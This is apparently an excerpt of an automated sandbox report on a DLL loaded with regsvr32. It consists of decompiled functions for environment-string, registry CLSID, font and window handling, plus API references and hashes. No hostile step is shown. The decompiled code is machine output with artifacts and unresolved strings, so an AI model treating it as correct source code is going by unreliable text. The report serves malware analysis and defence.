                                                                                                            0x100166fa
                                                                                                            0x10016702
                                                                                                            0x10016706
                                                                                                            0x10016713
                                                                                                            0x10016715
                                                                                                            0x10016717
                                                                                                            0x10016719
                                                                                                            0x1001671d
                                                                                                            0x10016723
                                                                                                            0x10016723
                                                                                                            0x10016727
                                                                                                            0x10016727
                                                                                                            0x10016706
                                                                                                            0x1001672c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100166cc
                                                                                                            0x100166cc
                                                                                                            0x100166cc
                                                                                                            0x100166cc
                                                                                                            0x100166ce
                                                                                                            0x100166d3
                                                                                                            0x100166d5
                                                                                                            0x00000000
                                                                                                            0x100166cc
                                                                                                            0x100166bf
                                                                                                            0x100166c3
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100166c3
                                                                                                            0x10016689
                                                                                                            0x1001668d
                                                                                                            0x1001669b
                                                                                                            0x100166a1
                                                                                                            0x100166a4
                                                                                                            0x100166af
                                                                                                            0x100166a6
                                                                                                            0x100166a6
                                                                                                            0x100166a8
                                                                                                            0x100166a8
                                                                                                            0x00000000
                                                                                                            0x1001668f
                                                                                                            0x1001668f
                                                                                                            0x00000000
                                                                                                            0x1001668f

                                                                                                            APIs
                                                                                                            • GetEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10016687
                                                                                                            • GetLastError.KERNEL32(?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 1001669B
                                                                                                            • GetEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 100166BD
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,10011248), ref: 100166F1
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,10011248,?,?), ref: 10016713
                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 1001672C
                                                                                                            • GetEnvironmentStrings.KERNEL32(00000000,?,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10016742
                                                                                                            • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 1001677E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: EnvironmentStrings$ByteCharFreeMultiWide$ErrorLast
                                                                                                            • String ID: @Mv@hvpYv
                                                                                                            • API String ID: 883850110-4125583295
                                                                                                            • Opcode ID: bfeabb1aff3bc99bbfe24a1f77970b714d91aefed0498c732c899eb5009dd72e
                                                                                                            • Instruction ID: 9752ab07c098c977bc575d501e7eaa0deb9efe59c3b15e47417eb48d6ecdcefd
                                                                                                            • Opcode Fuzzy Hash: bfeabb1aff3bc99bbfe24a1f77970b714d91aefed0498c732c899eb5009dd72e
                                                                                                            • Instruction Fuzzy Hash: 7831A5B260D26A6FE311EF654CC882BBADCEB4E1D8712092DF681CB191D671DCC496A1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1002583A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 68registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 82%
                                                                                                            			E1002583A(void* _a4, intOrPtr _a8) {
				void* _v8;
				void* _v12;
				int _v16;
				char* _v20;
				int _v24;
				void* __ebx;
				void* __edi;
				signed int _t35;
				void* _t37;
				void* _t42;
				int* _t43;

				_t43 = 0;
				_v12 = 0;
				_v20 = E100017D0(_a8, 0x104);
				_v16 = 0x104;
				_t42 = RegOpenKeyA;
				_v24 = 0;
				if(RegOpenKeyA(0x80000000, ?str?,  &_v12) == 0) {
					_push(_t37);
					_v8 = 0;
					if(RegOpenKeyA(_v12, _a4,  &_v8) == 0) {
						_a4 = 0;
						if(RegOpenKeyA(_v8, "InProcServer32",  &_a4) == 0) {
							_t35 = RegQueryValueExA(_a4, 0x1003da51, 0,  &_v24, _v20,  &_v16);
							asm("sbb esi, esi");
							_t43 =  ~_t35 + 1;
							RegCloseKey(_a4);
						}
						RegCloseKey(_v8);
					}
					RegCloseKey(_v12);
					_pop(_t37);
				}
				E10006CE2(_t37, _a8, _t42, 0xffffffff);
				return _t43;
			}














                                                                                                            0x1002584a
                                                                                                            0x1002584d
                                                                                                            0x10025855
                                                                                                            0x10025861
                                                                                                            0x10025864
                                                                                                            0x1002586f
                                                                                                            0x10025876
                                                                                                            0x10025878
                                                                                                            0x10025880
                                                                                                            0x10025890
                                                                                                            0x1002589e
                                                                                                            0x100258a5
                                                                                                            0x100258bb
                                                                                                            0x100258c8
                                                                                                            0x100258ca
                                                                                                            0x100258cb
                                                                                                            0x100258cb
                                                                                                            0x100258d0
                                                                                                            0x100258d0
                                                                                                            0x100258d5
                                                                                                            0x100258d7
                                                                                                            0x100258d7
                                                                                                            0x100258dd
                                                                                                            0x100258e7

                                                                                                            APIs
                                                                                                            • RegOpenKeyA.ADVAPI32(80000000,CLSID,?), ref: 10025872
                                                                                                            • RegOpenKeyA.ADVAPI32(?,?,?), ref: 10025886
                                                                                                            • RegOpenKeyA.ADVAPI32(?,InProcServer32,?), ref: 100258A1
                                                                                                            • RegQueryValueExA.ADVAPI32(?,1003DA51,00000000,?,?,?), ref: 100258BB
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 100258CB
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 100258D0
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 100258D5
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpen$QueryValue
                                                                                                            • String ID: CLSID$InProcServer32
                                                                                                            • API String ID: 3523390698-323508013
                                                                                                            • Opcode ID: 0f9c6b5e3f4a76f5fb44a6b70cf5269a04b4aae784ef91a0774247bb7487627f
                                                                                                            • Instruction ID: 98c4733b419a9a9fcc8d3b331f1c0e54a211d8c73680194401ba1897b1518396
                                                                                                            • Opcode Fuzzy Hash: 0f9c6b5e3f4a76f5fb44a6b70cf5269a04b4aae784ef91a0774247bb7487627f
                                                                                                            • Instruction Fuzzy Hash: A511297680012DBFEF02EFA5CC80DEEBBB9EF446A0F114122FA05A6150D7719B51DBA4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10036531 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 60COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10036531() {
				struct HWND__* _v4;
				void* _v68;
				void* _v76;
				int _t4;
				int _t10;
				struct HDC__* _t15;
				void* _t18;

				_t4 =  *0x1004b8cc; // 0xffffffff
				if(_t4 == 0xffffffff) {
					_t15 = GetDC(0);
					_v4 = 0;
					_t18 = CreateFontA(GetSystemMetrics(0x48), 0, 0, 0, 0x190, 0, 0, 0, 2, 0, 0, 0, 0, "Marlett");
					if(_t18 != 0) {
						_v68 = SelectObject(_t15, _t18);
					}
					GetCharWidthA(_t15, 0x36, 0x36, 0x1004b8cc);
					if(_t18 != 0) {
						SelectObject(_t15, _v76);
						DeleteObject(_t18);
					}
					ReleaseDC(0, _t15);
					_t10 =  *0x1004b8cc; // 0xffffffff
					return _t10;
				}
				return _t4;
			}










                                                                                                            0x10036532
                                                                                                            0x1003653a
                                                                                                            0x10036561
                                                                                                            0x10036563
                                                                                                            0x1003657a
                                                                                                            0x1003657e
                                                                                                            0x10036584
                                                                                                            0x10036584
                                                                                                            0x10036592
                                                                                                            0x1003659a
                                                                                                            0x100365a1
                                                                                                            0x100365a4
                                                                                                            0x100365a4
                                                                                                            0x100365ac
                                                                                                            0x100365b2
                                                                                                            0x00000000
                                                                                                            0x100365ba
                                                                                                            0x100365bc

                                                                                                            APIs
                                                                                                            • GetDC.USER32(00000000), ref: 10036543
                                                                                                            • GetSystemMetrics.USER32 ref: 10036567
                                                                                                            • CreateFontA.GDI32(00000000,?,?,?,?,?,10036A10,?,?,?,?,?,?,?), ref: 1003656E
                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 10036582
                                                                                                            • GetCharWidthA.GDI32(00000000,00000036,00000036,1004B8CC), ref: 10036592
                                                                                                            • SelectObject.GDI32(00000000,?), ref: 100365A1
                                                                                                            • DeleteObject.GDI32(00000000), ref: 100365A4
                                                                                                            • ReleaseDC.USER32 ref: 100365AC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Object$Select$CharCreateDeleteFontMetricsReleaseSystemWidth
                                                                                                            • String ID: Marlett
                                                                                                            • API String ID: 1397664628-3688754224
                                                                                                            • Opcode ID: 02a284a0c2a362a437aa0b11f12343519aacb4f4528957fd96303176c2f861e5
                                                                                                            • Instruction ID: 1088ce7175f154466d6028c012866e6bff604f09a65bd199e6d5657c5750c08b
                                                                                                            • Opcode Fuzzy Hash: 02a284a0c2a362a437aa0b11f12343519aacb4f4528957fd96303176c2f861e5
                                                                                                            • Instruction Fuzzy Hash: 5D014071542634BFE2269B668C8CD9B7FACEF467E5F104518F209DA152CB614900CBB4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1003982F Relevance: 15.2, APIs: 10, Instructions: 181memorystringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 53%
                                                                                                            			E1003982F(void* __ecx) {
				intOrPtr _t52;
				intOrPtr _t53;
				void* _t57;
				CHAR* _t60;
				CHAR* _t88;
				CHAR* _t89;
				void* _t102;
				CHAR* _t103;
				CHAR* _t105;
				CHAR* _t106;
				CHAR* _t107;
				void* _t111;
				short* _t112;
				void* _t122;
				void* _t127;
				void* _t129;
				void* _t131;

				_t127 = _t129 - 0x8c;
				_t52 =  *0x1004c470; // 0xf3933a06
				 *((intOrPtr*)(_t127 + 0x88)) = _t52;
				_t53 =  *0x1004b0a0(_t111, _t122, _t102);
				_t112 =  *((intOrPtr*)(_t127 + 0x94));
				 *((intOrPtr*)(_t127 - 0x7c)) = _t53;
				E10011C50(_t112, 0, 0x20);
				_t103 =  *(_t127 + 0x98);
				_t131 = _t129 - 0x10c + 0xc;
				_t109 = _t103;
				 *(_t127 - 0x80) = _t127 - 0x78;
				if(E100244DE(_t103, 0x100410f8) == 0) {
					_t109 = _t103;
					_t57 = E100244DE(_t103, 0x1003d114);
					_push(0x100);
					_push(_t127 - 0x78);
					if(_t57 == 0) {
						_push(0xf108);
						E100245D3();
						 *_t112 = 0xf108;
						L12:
						_t60 = 0;
						if( *(_t127 - 0x80) == 0) {
							L14:
							__imp__#2(_t60);
							 *(_t112 + 8) = _t60;
							if( *(_t112 + 4) == 0) {
								_t106 =  *(E100373B5() + 0x10);
								if(_t106 != 0) {
									_t115 = lstrlenA(_t106) + 1;
									E10010B20(lstrlenA(_t106) + 0x00000001 + lstrlenA(_t106) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109);
									_t60 = E100067FA(_t131, _t106, _t115,  *((intOrPtr*)(_t127 - 0x7c)));
									_t112 =  *((intOrPtr*)(_t127 + 0x94));
								} else {
									_t60 = 0;
								}
								__imp__#2(_t60);
								 *(_t112 + 4) = _t60;
							}
							if( *(_t112 + 0xc) == 0 &&  *(_t112 + 0x10) != 0) {
								_t105 =  *( *((intOrPtr*)(E100373B5() + 4)) + 0x60);
								if(_t105 != 0) {
									_t126 = lstrlenA(_t105) + 1;
									E10010B20(lstrlenA(_t105) + 0x00000001 + lstrlenA(_t105) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109);
									_t60 = E100067FA(_t131, _t105, _t126,  *((intOrPtr*)(_t127 - 0x7c)));
								} else {
									_t60 = 0;
								}
								__imp__#2(_t60);
								 *(_t112 + 0xc) = _t60;
							}
							return E100117AE(_t60,  *((intOrPtr*)(_t127 + 0x88)));
						}
						L13:
						_t117 = lstrlenA( *(_t127 - 0x80)) + 1;
						E10010B20(lstrlenA( *(_t127 - 0x80)) + 0x00000001 + lstrlenA( *(_t127 - 0x80)) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109);
						_t60 = E100067FA(_t131,  *(_t127 - 0x80), _t117,  *((intOrPtr*)(_t127 - 0x7c)));
						_t112 =  *((intOrPtr*)(_t127 + 0x94));
						goto L14;
					}
					_push(0xf10a);
					E100245D3();
					 *_t112 = 0xf10a;
					goto L13;
				}
				 *(_t127 - 0x80) = _t103[0xc];
				 *_t112 = _t103[8];
				 *(_t112 + 0x10) = _t103[0x10];
				 *(_t112 + 0x1c) = _t103[0x1c];
				_t88 = _t103[0x14];
				 *(_t127 + 0x98) = _t88;
				if( *((intOrPtr*)(_t88 - 0xc)) != 0) {
					if(_t88 != 0) {
						_t121 = lstrlenA(_t88) + 1;
						E10010B20(lstrlenA(_t88) + 0x00000001 + lstrlenA(_t88) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109);
						_t88 = E100067FA(_t131,  *(_t127 + 0x98), _t121,  *((intOrPtr*)(_t127 - 0x7c)));
						_t112 =  *((intOrPtr*)(_t127 + 0x94));
					}
					__imp__#2(_t88);
					 *(_t112 + 0xc) = _t88;
				}
				_t107 = _t103[0x18];
				_t89 = 0;
				if( *((intOrPtr*)(_t107 - 0xc)) != 0) {
					if(_t107 != 0) {
						_t119 = lstrlenA(_t107) + 1;
						E10010B20(lstrlenA(_t107) + 0x00000001 + lstrlenA(_t107) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109);
						_t89 = E100067FA(_t131, _t107, _t119,  *((intOrPtr*)(_t127 - 0x7c)));
						_t112 =  *((intOrPtr*)(_t127 + 0x94));
					}
					__imp__#2(_t89);
					 *(_t112 + 4) = _t89;
				}
				goto L12;
			}




















                                                                                                            0x10039830
                                                                                                            0x1003983d
                                                                                                            0x10039845
                                                                                                            0x1003984b
                                                                                                            0x10039851
                                                                                                            0x1003985c
                                                                                                            0x1003985f
                                                                                                            0x10039864
                                                                                                            0x1003986a
                                                                                                            0x10039875
                                                                                                            0x10039877
                                                                                                            0x10039887
                                                                                                            0x10039935
                                                                                                            0x10039937
                                                                                                            0x1003993e
                                                                                                            0x10039946
                                                                                                            0x10039947
                                                                                                            0x1003995a
                                                                                                            0x1003995f
                                                                                                            0x10039964
                                                                                                            0x10039969
                                                                                                            0x10039969
                                                                                                            0x1003996e
                                                                                                            0x1003999b
                                                                                                            0x1003999c
                                                                                                            0x100399a6
                                                                                                            0x100399a9
                                                                                                            0x100399b0
                                                                                                            0x100399b5
                                                                                                            0x100399c0
                                                                                                            0x100399ca
                                                                                                            0x100399d7
                                                                                                            0x100399dc
                                                                                                            0x100399b7
                                                                                                            0x100399b7
                                                                                                            0x100399b7
                                                                                                            0x100399e3
                                                                                                            0x100399e9
                                                                                                            0x100399e9
                                                                                                            0x100399f0
                                                                                                            0x10039a00
                                                                                                            0x10039a05
                                                                                                            0x10039a10
                                                                                                            0x10039a1a
                                                                                                            0x10039a27
                                                                                                            0x10039a07
                                                                                                            0x10039a07
                                                                                                            0x10039a07
                                                                                                            0x10039a2d
                                                                                                            0x10039a33
                                                                                                            0x10039a33
                                                                                                            0x10039a51
                                                                                                            0x10039a51
                                                                                                            0x10039970
                                                                                                            0x10039977
                                                                                                            0x10039981
                                                                                                            0x10039990
                                                                                                            0x10039995
                                                                                                            0x00000000
                                                                                                            0x10039995
                                                                                                            0x10039949
                                                                                                            0x1003994e
                                                                                                            0x10039953
                                                                                                            0x00000000
                                                                                                            0x10039953
                                                                                                            0x10039890
                                                                                                            0x10039897
                                                                                                            0x1003989d
                                                                                                            0x100398a3
                                                                                                            0x100398a6
                                                                                                            0x100398ad
                                                                                                            0x100398b3
                                                                                                            0x100398b7
                                                                                                            0x100398be
                                                                                                            0x100398c8
                                                                                                            0x100398da
                                                                                                            0x100398df
                                                                                                            0x100398df
                                                                                                            0x100398e6
                                                                                                            0x100398ec
                                                                                                            0x100398ec
                                                                                                            0x100398ef
                                                                                                            0x100398f2
                                                                                                            0x100398f7
                                                                                                            0x100398fb
                                                                                                            0x10039902
                                                                                                            0x1003990c
                                                                                                            0x10039919
                                                                                                            0x1003991e
                                                                                                            0x1003991e
                                                                                                            0x10039925
                                                                                                            0x1003992b
                                                                                                            0x1003992b
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • lstrlenA.KERNEL32(?,100410F8), ref: 100398BA
                                                                                                              • Part of subcall function 100067FA: MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,?,?), ref: 1000681C
                                                                                                            • SysAllocString.OLEAUT32(?), ref: 100398E6
                                                                                                            • lstrlenA.KERNEL32(?,100410F8), ref: 100398FE
                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 10039925
                                                                                                            • lstrlenA.KERNEL32(?,0000F108,?,00000100,1003D114,100410F8), ref: 10039973
                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 1003999C
                                                                                                            • lstrlenA.KERNEL32(?), ref: 100399BC
                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 100399E3
                                                                                                            • lstrlenA.KERNEL32(?), ref: 10039A0C
                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 10039A2D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocStringlstrlen$ByteCharMultiWide
                                                                                                            • String ID:
                                                                                                            • API String ID: 2903237683-0
                                                                                                            • Opcode ID: d0e283d36d7e8a4e4201feedb9b32d85caebebb8c09a47d8d95a8ace7938a35f
                                                                                                            • Instruction ID: 094128f662b1ec739eea3e3cde0adae16dde2bfe5a7d45c4af97d4efa71afc42
                                                                                                            • Opcode Fuzzy Hash: d0e283d36d7e8a4e4201feedb9b32d85caebebb8c09a47d8d95a8ace7938a35f
                                                                                                            • Instruction Fuzzy Hash: A251A476900619EFDB20DF78CC85B8AB7B8FF09255F108526F519CB242DB74E950CBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1002F6AD Relevance: 15.1, APIs: 10, Instructions: 96COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1002F6AD(void* __ecx, int _a4) {
				int _v8;
				struct tagRECT _v24;
				long _t39;
				int _t42;
				int _t43;
				int _t62;
				int _t66;
				void* _t68;
				long _t69;
				int _t71;

				_t69 = _a4;
				_t68 = __ecx;
				_t39 = DefWindowProcA( *(__ecx + 0x1c), 0x46, 0, _t69);
				if(( *(_t69 + 0x18) & 0x00000001) == 0) {
					GetWindowRect( *(_t68 + 0x1c),  &_v24);
					_t42 = _a4;
					_t66 =  *(_t42 + 0x10);
					_t71 = _v24.right - _v24.left;
					_t62 = _v24.bottom - _v24.top;
					_t43 =  *(_t42 + 0x14);
					_v8 = _t66;
					_a4 = _t43;
					if(_t66 != _t71 && ( *(_t68 + 0x7d) & 0x00000004) != 0) {
						SetRect( &_v24, _t66 -  *0x1004efa0, 0, _t66, _t43);
						InvalidateRect( *(_t68 + 0x1c),  &_v24, 1);
						SetRect( &_v24, _t71 -  *0x1004efa0, 0, _t71, _a4);
						InvalidateRect( *(_t68 + 0x1c),  &_v24, 1);
						_t66 = _v8;
						_t43 = _a4;
					}
					if(_t43 != _t62 && ( *(_t68 + 0x7d) & 0x00000008) != 0) {
						SetRect( &_v24, 0, _t43 -  *0x1004efa4, _t66, _t43);
						InvalidateRect( *(_t68 + 0x1c),  &_v24, 1);
						SetRect( &_v24, 0, _t62 -  *0x1004efa4, _v8, _t62);
						_t43 = InvalidateRect( *(_t68 + 0x1c),  &_v24, 1);
					}
					return _t43;
				}
				return _t39;
			}













                                                                                                            0x1002f6b4
                                                                                                            0x1002f6bb
                                                                                                            0x1002f6c2
                                                                                                            0x1002f6cc
                                                                                                            0x1002f6da
                                                                                                            0x1002f6e0
                                                                                                            0x1002f6e6
                                                                                                            0x1002f6e9
                                                                                                            0x1002f6ef
                                                                                                            0x1002f6f4
                                                                                                            0x1002f6f7
                                                                                                            0x1002f6fa
                                                                                                            0x1002f6fd
                                                                                                            0x1002f714
                                                                                                            0x1002f723
                                                                                                            0x1002f73a
                                                                                                            0x1002f749
                                                                                                            0x1002f74f
                                                                                                            0x1002f752
                                                                                                            0x1002f752
                                                                                                            0x1002f757
                                                                                                            0x1002f774
                                                                                                            0x1002f77f
                                                                                                            0x1002f796
                                                                                                            0x1002f7a1
                                                                                                            0x1002f7a1
                                                                                                            0x00000000
                                                                                                            0x1002f7a7
                                                                                                            0x1002f7ab

                                                                                                            APIs
                                                                                                            • DefWindowProcA.USER32(?,00000046,00000000,?), ref: 1002F6C2
                                                                                                            • GetWindowRect.USER32 ref: 1002F6DA
                                                                                                            • SetRect.USER32 ref: 1002F714
                                                                                                            • InvalidateRect.USER32(?,?,00000001), ref: 1002F723
                                                                                                            • SetRect.USER32 ref: 1002F73A
                                                                                                            • InvalidateRect.USER32(?,?,00000001), ref: 1002F749
                                                                                                            • SetRect.USER32 ref: 1002F774
                                                                                                            • InvalidateRect.USER32(?,?,00000001), ref: 1002F77F
                                                                                                            • SetRect.USER32 ref: 1002F796
                                                                                                            • InvalidateRect.USER32(?,?,00000001), ref: 1002F7A1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Rect$Invalidate$Window$Proc
                                                                                                            • String ID:
                                                                                                            • API String ID: 570070710-0
                                                                                                            • Opcode ID: c01845c7316c7950b7ef2fd5e5f7f0b699cb6ea0eaa739eb132b7bf5853a6ab6
                                                                                                            • Instruction ID: 759c21b255db7c4f0b51d9d2c83ad8eda26887521645a94a827a2b7369984522
                                                                                                            • Opcode Fuzzy Hash: c01845c7316c7950b7ef2fd5e5f7f0b699cb6ea0eaa739eb132b7bf5853a6ab6
                                                                                                            • Instruction Fuzzy Hash: C631C972900259BFEB01DFA5DD88FAE7BB8EB04344F504125FA01AB5A1D770AE54CBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10020B9B Relevance: 15.1, APIs: 10, Instructions: 81stringregistryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10020B9B() {
				signed int _t39;
				CHAR* _t43;
				int _t44;
				WNDCLASSA* _t63;
				void* _t71;
				void* _t73;

				E10011BF0(0x1003a552, _t71);
				_t63 =  *(_t71 + 8);
				 *((intOrPtr*)(_t71 - 0x10)) = _t73 - 0x38;
				if(GetClassInfoA(_t63->hInstance, _t63->lpszClassName, _t71 - 0x40) == 0) {
					if(RegisterClassA(_t63) == 0) {
						L5:
						_t39 = 0;
					} else {
						 *(_t71 - 0x18) = 1;
						if( *((char*)(E100373B5() + 0x14)) == 0) {
							L10:
							_t39 =  *(_t71 - 0x18);
						} else {
							E10037A1B(1);
							 *(_t71 - 4) =  *(_t71 - 4) & 0x00000000;
							_t43 = E100373B5() + 0x34;
							 *(_t71 - 0x14) = _t43;
							_t44 = lstrlenA(_t43);
							_t13 = lstrlenA(_t63->lpszClassName) + 2; // 0x2
							if(_t44 + _t13 < 0x1000) {
								 *(_t71 + 8) = lstrlenA( *(_t71 - 0x14));
								if( *(_t71 + 8) + lstrlenA(_t63->lpszClassName) + 2 >= 0x1000) {
									 *(_t71 - 0x18) =  *(_t71 - 0x18) & 0x00000000;
									UnregisterClassA(_t63->lpszClassName, _t63->hInstance);
								} else {
									lstrcatA( *(_t71 - 0x14), _t63->lpszClassName);
									 *(_t71 + 0xa) = 0xa;
									 *((char*)(_t71 + 0xb)) = 0;
									lstrcatA( *(_t71 - 0x14), _t71 + 0xa);
								}
								 *(_t71 - 4) =  *(_t71 - 4) | 0xffffffff;
								E10037A7E(1);
								goto L10;
							} else {
								goto L5;
							}
						}
					}
				} else {
					_t39 = 1;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t71 - 0xc));
				return _t39;
			}









                                                                                                            0x10020ba0
                                                                                                            0x10020bab
                                                                                                            0x10020bae
                                                                                                            0x10020bc3
                                                                                                            0x10020bd7
                                                                                                            0x10020c20
                                                                                                            0x10020c20
                                                                                                            0x10020bd9
                                                                                                            0x10020bdc
                                                                                                            0x10020be8
                                                                                                            0x10020c78
                                                                                                            0x10020c78
                                                                                                            0x10020bee
                                                                                                            0x10020bef
                                                                                                            0x10020bf4
                                                                                                            0x10020c03
                                                                                                            0x10020c07
                                                                                                            0x10020c0a
                                                                                                            0x10020c13
                                                                                                            0x10020c1e
                                                                                                            0x10020c2c
                                                                                                            0x10020c3a
                                                                                                            0x10020c60
                                                                                                            0x10020c67
                                                                                                            0x10020c3c
                                                                                                            0x10020c48
                                                                                                            0x10020c51
                                                                                                            0x10020c55
                                                                                                            0x10020c59
                                                                                                            0x10020c59
                                                                                                            0x10020c6d
                                                                                                            0x10020c73
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10020c1e
                                                                                                            0x10020be8
                                                                                                            0x10020bc5
                                                                                                            0x10020bc7
                                                                                                            0x10020bc7
                                                                                                            0x10020c80
                                                                                                            0x10020c89

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
